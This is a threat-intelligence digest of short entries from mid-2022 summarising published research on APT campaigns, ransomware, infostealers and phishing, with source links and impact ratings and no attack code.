- APT29_Group_leveraging_Online_Storage_Services
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers noticed that Russian SVR hackers using Google Drive and Dropbox to evade detection. APT29 has adopted this new tactic in recent campaigns targeting Western diplomatic missions and foreign embassies worldwide.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/
—
- Intel Source:
- Resecurity
- Intel Name:
- Attackers_leveraging_tools_to_generate_LNK_Files_to_deliver_payload
- Date of Scan:
- 2022-07-19
- Impact:
- LOW
- Summary:
- Threat Hunters from Resecurity have detected popular tools used by cybercriminals. Attackers are actively leveraging tools allowing them to generate malicious shortcut files (.LNK files) for payload delivery.
—
- Intel Source:
- CISA
- Intel Name:
- A_continued_exploitation of Log4Shell in VMware Horizon Systems
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- CISA has updated the Cybersecurity Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon, originally released June 23, 2022. The advisory now includes updated IOCs provided in Malware Analysis Report (MAR)-10382580-2.
—
- Intel Source:
- Citizen Lab
- Intel Name:
- Pegasus_Spyware_Used_Against_Thailand_s_Pro_Democracy_Movement
- Date of Scan:
- 2022-07-19
- Impact:
- LOW
- Summary:
- Citizen Lab discovered an extensive espionage campaign targeting Thai pro-democracy protesters, and activists calling for reforms to the monarchy
—
- Intel Source:
- Weixin
- Intel Name:
- Lazarus_Forged_Analysis_Report_on_Ecommerce_Component_Attack_Activities
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- The APT-C-26 (Lazarus) organization has a clear purpose of this attack. It continue the attack activity disguised itself as an Alibaba-related component to attack. The payload component is related to the NukeSped family.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Elastix_VoIP_systems_hacked_in_massive_campaign
- Date of Scan:
- 2022-07-18
- Impact:
- LOW
- Summary:
- Recently, Palo Alto Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target’s Digium phone software (a FreePBX module written in PHP)
Source:
https://unit42.paloaltonetworks.com/digium-phones-web-shell/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Phishing_campaign_involving_Emotet
- Date of Scan:
- 2022-07-18
- Impact:
- LOW
- Summary:
- Cyfirma researchers noticed multiple phishing campaigns involving Emotet which is dropped through a n Excel 4.0 (.xls) file as attachment.
—
- Intel Source:
- Cloudsek
- Intel Name:
- The_Newly_Emerged_BlueSky_Ransomware
- Date of Scan:
- 2022-07-16
- Impact:
- MEDIUM
- Summary:
- CloudSEK discovered a financially motivated ransomware group, dubbed BlueSky, speculated to be connected to the Conti ransomware group.
—
- Intel Source:
- Qianxin Blog
- Intel Name:
- The_Maha_grass_group_attack_activity_against_Pakistan
- Date of Scan:
- 2022-07-16
- Impact:
- LOW
- Summary:
- Recenty the Red Raindrop team of Qi’anxin Threat Intelligence Center observed several attack samples of the organization in daily threat hunting. In this attack, the attacker uses a vulnerable RTF file to carry out a spear poking attack.
—
- Intel Source:
- Wordsfence
- Intel Name:
- Sudden_Increase_In_Attacks_On_Modern_WPBakery_Page_Builder_Addons_Vulnerability
- Date of Scan:
- 2022-07-16
- Impact:
- LOW
- Summary:
- The Wordfence Threat Intelligence team has been observed a spike in the attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign is aiming to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which has been previously disclosed and has not been patched on the now closed plugin.
Source:
https://www.wordfence.com/blog/2022/07/attacks-on-modern-wpbakery-page-builder-addons-vulnerability/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0100_group_leveraging_Online_Fraud_to_target_Ukraine
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- CERT-UA has discovered fraudulent pages on the Facebook containing links to “Unified Compensation Center for the Return of Unpaid Funds”. The fraudulent pages suggesting users to provide personal information and make payments, which is harvesting payment card information.
—
- Intel Source:
- Antiy Group
- Intel Name:
- Indian_APT_group_Confucius_targets_Pakistan_government_and_military_institutions
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- Antity group researcher published their findings on Indian APT Confucius campaigns targeting the Pakistani government and military institutions.
—
- Intel Source:
- Cyble
- Intel Name:
- ApolloRat_Malware_compiled_using_Nuitka
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- Cyble Researcher team has discovered a new RAT dubbed ApolloRAT.it is written in Python and uses Discord as its Command and Control (C&C) Server.
Source:
https://blog.cyble.com/2022/07/14/apollorat-evasive-malware-compiled-using-nuitka/
—
- Intel Source:
- NCC Group
- Intel Name:
- Everest_Ransomware_new_TTPs_and_relation_to_Black_Byte
- Date of Scan:
- 2022-07-15
- Impact:
- MEDIUM
- Summary:
- Researchers at NCC Group analysed an Everest ransomware file, which they assess with medium confidence that Everest ransomware is related to Black-Byte. And documented new TTPs employed by the Everest Ransomware group.
Source:
https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/
—
- Intel Source:
- Microsoft
- Intel Name:
- North_Korean_threat_actors_uses_H0lyGh0st_ransomware
- Date of Scan:
- 2022-07-15
- Impact:
- MEDIUM
- Summary:
- Microsoft threat intelligence center tracked a threat group DEV-0530 who is using H0lyGh0st ransomware to target small and midsize businesses.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_campaign_ongoing_by_Transparent_Tribe_APT_group
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos has discovered a malicious campaign targeting students of universities and colleges in India. it is also suggests that the APT is actively expanding its network of victims to include civilian users.
Source:
https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html
—
- Intel Source:
- Cyble
- Intel Name:
- NoMercy_Stealer_Rapidly_Evolving_Into_Clipper_Malware
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Threat Hunters by exercising discovered, a new stealer named “NoMercy”. The investigation indicated that the stealer is a very crude and simple information stealer in its initial stages and TAs behind this are actively modifying the stealer and adding additional capabilities.
Source:
https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/
—
- Intel Source:
- Security Affairs
- Intel Name:
- A_cryptomining_campaign_targets_Linux_servers
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Microsoft Security Intelligence experts are warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto miners.
—
- Intel Source:
- Intezer
- Intel Name:
- Orbit_Malware_targeting_Linux_goes_undetected
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Intezer researchers provided technical analysis of a new and fully undetected malware dubbed “Orbit” that is targeting Linux systems. This malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands.
Source:
https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Phishing_tax_scam_at_Canada
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Phishing scammers pose as Canadian tax agency before Canada Day
Source:
https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Threat_Actors_abusing_Red_teaming_tools
- Date of Scan:
- 2022-07-07
- Impact:
- MEDIUM
- Summary:
- Unit 42 PaloAlto recently hunted and discovered the new samples that match known advanced persistent threat (APT) patterns and tactics. These samples evaluated and raised an obvious detection concerns. The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market.
Source:
https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
—
- Intel Source:
- CISA
- Intel Name:
- NorthKorean_Threat_actors_uses_Maui_Ransomware
- Date of Scan:
- 2022-07-07
- Impact:
- MEDIUM
- Summary:
- A joint CSA has been released by FBI,CISA and DOT about Maui ransomware being used by North Korean threat actors to target Healthcare and Public Health Sector.
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt_Strike_and_Meterpreter
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Reserachers from ASEC analyzed the attack case that installs Cobalt Strike and Meterpreter in vulnerable MS-SQL servers to gain control. The attacker then installs AnyDesk to control the infected system in a remote desktop environment.
—
- Intel Source:
- SecuInfra
- Intel Name:
- Bitter_APT_targets_Bangladesh
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Researchers from Secuinfra analyzed a attack by Bitter APT group who has targeted military organizations of Bangladesh.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- DarkComet_RAT_returned_with_new_TTPs
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Researchers from SocInvestigation documented about the new TTPs of DarkComet RAT and also its detection and response. Generally the Darkcomet is spread via Phishing campaign
Source:
https://www.socinvestigation.com/darkcomet-rat-returns-with-new-ttps-detection-response/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Stealing_Data
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- ReversingLabs researchers uncover malicious NMP packages stealing data as an evidence of a widespread software supply chain attack.
—
- Intel Source:
- Securonix
- Intel Name:
- Diving_deep_into_BumbleBee_Loader_updated_IOCs
- Date of Scan:
- 2022-07-06
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs Threat Research Team has analysed a sample of BumbleBee, it appear to follow a similar delivery mechanism which we can use to detect the initial foothold of the loader. Currently, AV detection of the BumbleBee loader is very weak as vendors work to update their signatures and heuristic detections. But the main DLL payload of this loader is very much capable of evading EDR detection at the time of publication.
—
- Intel Source:
- Microsoft
- Intel Name:
- The_new_Hive_variant
- Date of Scan:
- 2022-07-06
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files
Source:
https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/
—
- Intel Source:
- JPCERT
- Intel Name:
- Vsingle_Malware_used_by_Lazarus_Group
- Date of Scan:
- 2022-07-05
- Impact:
- MEDIUM
- Summary:
- Researchers from JPCERT detailed about VSingle malware used by the Lazarus group, which has been updated to retrieve C2 servers information from GitHub.
—
- Intel Source:
- Cyble
- Intel Name:
- Xloader_Malware_returns_with_new_infection_technique
- Date of Scan:
- 2022-07-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble has analysed an infection chain of Xloader malware. The malware uses multiple file types such as PDF, XLSX, and RTF for its initial infection and execution. It is also designed to drop three modules in memory and execute the final payload using the Process-Hollowing technique.
Source:
https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSand_Campaign
- Date of Scan:
- 2022-07-04
- Impact:
- LOW
- Summary:
- Researchers at Inquest has analysed Multistage malicious documnet masquerading as a Ukrainian military payroll document. The document was Obfuscated and geofenced to only infect UKraine systems.
—
- Intel Source:
- CISA
- Intel Name:
- MedusaLocker_Ransomware
- Date of Scan:
- 2022-07-04
- Impact:
- MEDIUM
- Summary:
- In a joint advisory by CISA, FBI, Treasury, FinCEN to support the #StopRansomware camapign, providing information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol(RDP) to access victims’ networks
—
- Intel Source:
- Intezer
- Intel Name:
- YTStealer_Malware
- Date of Scan:
- 2022-07-04
- Impact:
- LOW
- Summary:
- YTStealer is a malware that aims to steal YouTube authentication cookies. As a stealing program, it acts like many other stealing programs.
Source:
https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/
—
- Intel Source:
- SecureList
- Intel Name:
- SessionManager_IIS_backdoor
- Date of Scan:
- 2022-07-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureList were investigating IIS backdoor called SessionManager since early 2022. SessionManager has been used against NGOs, government, military and industrial organizations in Africa, South America, Asia, Europe, Russia and the Middle East, starting from at least March 2021.
Source:
https://securelist.com/the-sessionmanager-iis-backdoor/106868/
—
- Intel Source:
- Google blog
- Intel Name:
- Countering_hack_for_hire_attacker_groups
- Date of Scan:
- 2022-07-01
- Impact:
- LOW
- Summary:
- Google’s Threat Analysis Group (TAG) on Thursday released that they blocked as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. It has been seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.
Source:
https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/
—
- Intel Source:
- Cyble
- Intel Name:
- PennyWise_Infostealer_leveraging_YouTube_to_infect_users
- Date of Scan:
- 2022-07-01
- Impact:
- LOW
- Summary:
- Threat Hunters by exercising they discovered, a new stealer named “PennyWise”.The stealer appears to have been developed recently. The investigation indicated that the stealer is an emerging threat and the researchers witnessed multiple samples of this stealer active in the wild.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Black_Basta_Ransomware_gang_added_Qakbot_and_PrintNightmare_Exploit_to_their_Arsenal
- Date of Scan:
- 2022-06-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro identified Black Basta ransomware ransomware group that used the banking trojan QakBot as a means of entry and movement and took advantage of the PrintNightmare vulnerability to perform privileged file operations.
—
- Intel Source:
- Lumen blog
- Intel Name:
- New_ZuoRAT_malware_targets_SOHO_router
- Date of Scan:
- 2022-06-30
- Impact:
- LOW
- Summary:
- Black Lotus Labs, the threat intelligence arm of Lumen Technologies has identified and tracking the details of a new and sophisticated multistage remote access trojan (RAT) that leveraging infected SOHO routers to target predominantly North American and European networks of interest. This trojan grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold.
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_Stealer_v2
- Date of Scan:
- 2022-06-30
- Impact:
- LOW
- Summary:
- It was observed by reserachers this weekthey that cyber criminals using a new and improved version of the productive malware Raccoon Stealer that was barely three months after its authors announced they were quitting.
Source:
https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
—
- Intel Source:
- NetSkope
- Intel Name:
- Emotet_still_abusing_Microsoft_Office_Macros
- Date of Scan:
- 2022-06-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope Threat Labs has analysed campaign where Emotet is still being executed using malicious Mircosoft office documents. Despite the protection Microsoft released in 2022 to prevent the execution of Excel 4.0 (XLM) macros, this attack is still feasible against users who are using outdated versions of Office.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- AstraLocker_2.0_Ransomware_distributed_from_Microsoft_Word_files
- Date of Scan:
- 2022-06-29
- Impact:
- MEDIUM
- Summary:
- Researchers at ReversingLabs has discovered a new version of the AstraLocker ransomware (AstraLocker 2.0) that was being distributed directly from Microsoft Office files used as bait in phishing attacks.
—
- Intel Source:
- Fortinet
- Intel Name:
- Ukraine_targeted_by_Dark_Crystal_RAT_or_DCRat
- Date of Scan:
- 2022-06-29
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard Labs came across another file that was likely used in the attack campaign described by CERT-UA. However, the date of the file submission to VirusTotal, and the location of the submission being Ukraine. The new file however is in Excel (xlsx) format and contains malicious macros instead of the docx format and exploitation of CVE-2022-30190 (Follina).
Source:
https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat
—
- Intel Source:
- Zscaler
- Intel Name:
- Evilnum_APT_returns_with_new_Threat_and_TTPs
- Date of Scan:
- 2022-06-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler have been tracking Evilnum APT group since starting of 2022 and have seen this time with a newer target list and TTPs.The main distribution vector used by this threat group was Windows Shortcut files (LNK) sent inside malicious archive files (ZIP) as email attachments in spear phishing emails to the victims.
Source:
https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets
—
- Intel Source:
- Kaspersky ICS CERT
- Intel Name:
- ShadowPad_backdoor_and_MS_Exchange_bug_leveraged_to_attack_ICS
- Date of Scan:
- 2022-06-28
- Impact:
- LOW
- Summary:
- Researchers at Kaspersky ICS CERT has spotted a threat actor targeting organizations in the industrial, telecommunications, logistics and transport sectors in Pakistan, Afghanistan and Malaysia respectively exploiting Microsoft Exchange server vulnerability (CVE-2021-26855) and downloading Shadow backdoor.
—
- Intel Source:
- ASEC
- Intel Name:
- Software_Cracks_Distributing_Recordbreaker_Stealer
- Date of Scan:
- 2022-06-28
- Impact:
- LOW
- Summary:
- ASEC Research Team has analysed
—
- Intel Source:
- CERT-UA
- Intel Name:
- DarkCrystal_RAT_malware_attacking_Ukraining_telecom_operators
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- CERT-UA received information about Crystal RAT attack that is aimed at operators and telecommunications providers of Ukraine. It was distributed by e-mails with the topic “Free primary legal aid” and the attachment “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar”.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Python_malicious_script_executing_a_keylogger
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- Researcher from ISC.SANS disovered a Python script that has some interesting features that can conduct social engineering attacks
Source:
https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/
—
- Intel Source:
- Esentire
- Intel Name:
- Socgholish_initiated_through_Cobalt_Strike_payloads
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- ESentire had an observation of drive-by threats such as Socgholish, Gootkit Loader and Solarmarker are on the rise. Both Socgholish and Gootkit Loader have been linked to follow-on attacks initiated through Cobalt Strike payloads.
Source:
https://www.esentire.com/blog/socgholish-to-cobalt-strike-in-10-minutes
—
- Intel Source:
- Cybereason
- Intel Name:
- BlackBastaRansomware
- Date of Scan:
- 2022-06-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason analyzed the attack of BlackBasta ransomware and provided key details anbout its growth since inception
Source:
https://www.cybereason.com/blog/cybereason-vs.-black-basta-ransomware
—
- Intel Source:
- CISA
- Intel Name:
- Log4Shell_exploits_still_being_used_to_hack_VMware_servers
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
—
- Intel Source:
- Group-IB
- Intel Name:
- Conti_ArmAttack_Campaign
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- GroupIB researchers documented about CONTI ransomware new campaign dubbed as ARMattack. In this campaign they compromised at least more than 40 companies and it took 3 days for them to to that.
—
- Intel Source:
- SecureWorks
- Intel Name:
- BRONZ_STARLIGHT_Ransomware_Operations_levearge_HUI_Loader
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Secureworks CTU has observed a China-linked state-sponsored hacking group named Bronze Starlight deploying various ransomware families to hide the true intent of its attacks.
Source:
https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader
—
- Intel Source:
- ClearSky
- Intel Name:
- New_malware_associated_with_Iranian_SiameseKitten_Group_or_Lyceum
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Researchers at ClearSky security has discovered a new malware linked with Lyceum group. The is downloaded from a domain registered on June 6th, and it communicates with a previously unknown command and control server whose IP address is adjacent to that of the domain.
Source:
https://www.clearskysec.com/wp-content/uploads/2022/06/Lyceum-suicide-drone-23.6.pdf
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_Ransomware_being_distributed_using_Copyright_related_Emails
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- ASEC Research team has discovered the distribution of LockBit ransomware using phishing e-mail, and disguising itself as copyright claims e-mail. The phishing e-mail has a compressed file as an attachment that contains another compressed file inside.
—
- Intel Source:
- Sekoia
- Intel Name:
- CALISTO_Russian_Threat_Actor_continues_its_credential_harvesting_campaign
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Sekoia Threat & Detection Research Team has followed GoogleTAG team finding on russian threat actor CALISTO, and identified a phishing campaign where CALISTO uses Evilginx on its VPS to capture the victim’s credentials. This well known open source tool creates an SSL reverse proxy between the victim and a legitimate website to capture web credentials, 2FA tokens.
Source:
https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign/
—
- Intel Source:
- Palo Alto
- Intel Name:
- AA_distribution_Qakbot_with_DarkVNC_and_Cobalt Strike
- Date of Scan:
- 2022-06-23
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Intelligence unit has identified a new wave of QBOT infection further delivering DarkVNC and Cobalt Strike.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Chinese_Threat_actors_targets_Russian_Government_Agencies
- Date of Scan:
- 2022-06-23
- Impact:
- LOW
- Summary:
- CERT UA researchers discovered malicious files which have been used to exploit vulnerabilities in MS Office. This attack has been linked to Chinese threat actors.
—
- Intel Source:
- Cyble
- Intel Name:
- Keona_Clipper_Leverages_Telegram_For_Anonymity
- Date of Scan:
- 2022-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers found a post advertising a new clipper malware, namely “Keona Clipper.” The Keona clipper is unique and anonymous software wrapped in a Telegram bot with stealth and anonymity. Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.
Source:
https://blog.cyble.com/2022/06/22/keona-clipper-leverages-telegram-for-anonymity/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Tropic_Trooper_APT_new_TTPs
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Check Point researchers shared findings of the infection chain which includes a previously undescribed loader (dubbed “Nimbda”) written in Nim language on a group / activity cluster with ties to Tropic Trooper:
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_PowerShell_attack_in_Cryptocurrency_Browser_Extensions
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Researchers from SANS found a malicious powerShell script targeting cryptocurrency browser apps or extensions.
—
- Intel Source:
- McAfee
- Intel Name:
- Rise_of_LNK_Malware
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Researchers at McAfee Labs has identified three campiagns, where attackers abusing the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/#:~:text=An%20LNK%20file%20is%20a
to%20access%20another%20data%20object.
—
- Intel Source:
- Lab52
- Intel Name:
- MuddyWater’s_new_campagin_targetting_Middle_East
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- MuddyWater threat group, allegedly sponsored by the Iranian government and linked to the Iranian revolutionary guard, has mantained a “long-term” infection campaign targeting Middle East countries. Researchers from Lab52 found recent samples and discovered that attackers might modify its functionality in a later stage, based on the obtained information from the infected host or, at least, use it to download and drop the next infection stage.
Source:
https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/
—
- Intel Source:
- BitDefender
- Intel Name:
- RIG_Exploit_campaign_rapidly_modified_Raccoon_malware_with_Dridex
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Bitdefender researchers discovered a new RIG Exploit Kit campaign have rapidly adapted by replacing Raccoon malware with Dridex to make the most of the ongoing campaign.
—
- Intel Source:
- Kaspersky
- Intel Name:
- China_Linked_ToddyCat_APT_Pioneers_Novel_Spyware
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Kaspersky found APT group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. Also, they found a previously unknown passive backdoor they named Samurai and new trojan malware dubbed Ninja Trojan.
—
- Intel Source:
- Cyble
- Intel Name:
- Quantum Software Possibly Linked to Lazarus APT group
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble came across a post from a threat actor on deep web forum advertising about Quantum Software a LNK file based builder and it has possible links with Lazarus APT group.
Source:
https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
—
- Intel Source:
- Resecurity
- Intel Name:
- Cybercriminals_levearging_Azure_Front_Door_service_in_Phishing_attacks
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- Researchers at Resecurity has identified a phishing campaign delivered via Azure Front Door (AFD) service by Microsoft. This attack allows the bad actors to trick users and spread phishing content to intercept credentials from business applications and e-mail accounts.
Source:
https://resecurity.com/blog/article/cybercriminals-use-azure-front-door-in-phishing-attacks
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Avos_Ransomware_adds_new_Arsenal
- Date of Scan:
- 2022-06-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco Talos found a month long AvosLocker ransomware campaign in which the threat actors have leveraged Cobalt Strike, Sliver and multiple commercial network scanners.
Source:
https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_levarging_CredoMap_Malware_to-target_Ukraine
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email which contains an attachment of malicious document related to Nuclear Terrorism, after opening to it will leads to downloading an HTML file and executing JavaScript code (CVE-2022-30190), it will further download and launch the CredoMap malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0098_targeting_Ukraine_Critical_Infrastructure_facilities
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- CERT-UA has analysed an phishing email contains an attached malicious documents which open an HTML file and execute JavaScript code (CVE-2022-30190), it further download and run the malicious program Cobalt Strike Beacon.
—
- Intel Source:
- Zscaler
- Intel Name:
- Voicemail_themed_Phishing_attacks_targeting_industries_in_US
- Date of Scan:
- 2022-06-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscalar ThreatLabz has identified and monitoring the activities of a threat actor which targets users in various US-based organizations with malicious voicemail-notification-themed emails in an attempt to steal their Office365 and Outlook credentials.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Client_side_Magecart_attacks_still_around_but_more_covert
- Date of Scan:
- 2022-06-20
- Impact:
- MEDIUM
- Summary:
- Malwarebytes reseraches are saying that Magecart client-side attacks are still around and there are some changes took place in the threat landscape. Newly reported domains linked with ‘anti-VM’ skimmer. One thing known is that if the Magecart threat actors decided to switch their operations exclusively server-side then the majority of companies would lose visibility overnight.
—
- Intel Source:
- CyberInt
- Intel Name:
- BlackGuard_Infostealer
- Date of Scan:
- 2022-06-20
- Impact:
- LOW
- Summary:
- Researchers at CyberInt discovered campaigns abusing gaming forums and Discord channels to distribute BlackGuard, along with a new data exfiltration technique using Telegram.
Source:
https://cyberint.com/blog/research/blackguard-stealer/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_HWP_Files_distributed_through_PC_messengers
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- ASEC Research team has discovered the active distribution of APT files that are exploiting a feature of HWP files and targeting South-Korean users since long.
—
- Intel Source:
- S2W INC
- Intel Name:
- New_Version_of_Raccon_Stealer
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- Researchers from S2W Inc shared details around the new version of Raccoon Stealer and its operator who made announcement on the dark web forum “Exploit”, stating that after three and a half months of being temporarily suspended, V2 of the stealer is operational.
Source:
https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d
—
- Intel Source:
- Trendmicro
- Intel Name:
- CopperStealer_Malware_infecting_via_websites_hosting_fake_software
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- Trendmicro noticed a new version of CopperStealer with the infection vector starts with a website offering fake cracks and 2 stages of the attack: cryptor and dropper.
Source:
https://www.trendmicro.com/de_de/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer-malware/IOCs-websites-hosting-fake-cracks-spread-updated-copperstealer.txt
—
- Intel Source:
- Fortinet
- Intel Name:
- New_IceLoader_malware_3_0
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- While hunting for new malware families written in the Nim programming language, FortiGuard Labs discovered a loader malware with the strings “ICE_X” and “v3.0”. A loader is a type of malware that is intended for downloading and executing additional payloads provided by a threat actor to further their malicious objectives.
Source:
https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim
—
- Intel Source:
- Cyble
- Intel Name:
- Cerber2021_Ransomware_Back_In_Action
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs has analysed a smaple of Cerber2021 ransomware, which suggests that threat actors exploit recently patched/unpatched Atlasian vulnerabilities to deliver the ransomware.
Source:
https://blog.cyble.com/2022/06/17/cerber2021-ransomware-back-in-action/
https://otx.alienvault.com/indicator/domain/pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malspam_pushes_Matanbuchus_malware
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- Researchers from SANS found a malicious campaign pushing Matanbuchus malware which lead to Cobalt Strike.
—
- Intel Source:
- Sophos
- Intel Name:
- Confluence_exploits_leveraged_to_drop_ransomware_payloads
- Date of Scan:
- 2022-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Sophos Labs has identified attackers are leveraging Confluence exploits against Windows vulnerable servers and dropping Cerber Ransomware and also pushing down Cobalt Strike shellcode, running PowerShell commands.
—
- Intel Source:
- SocInvestigations
- Intel Name:
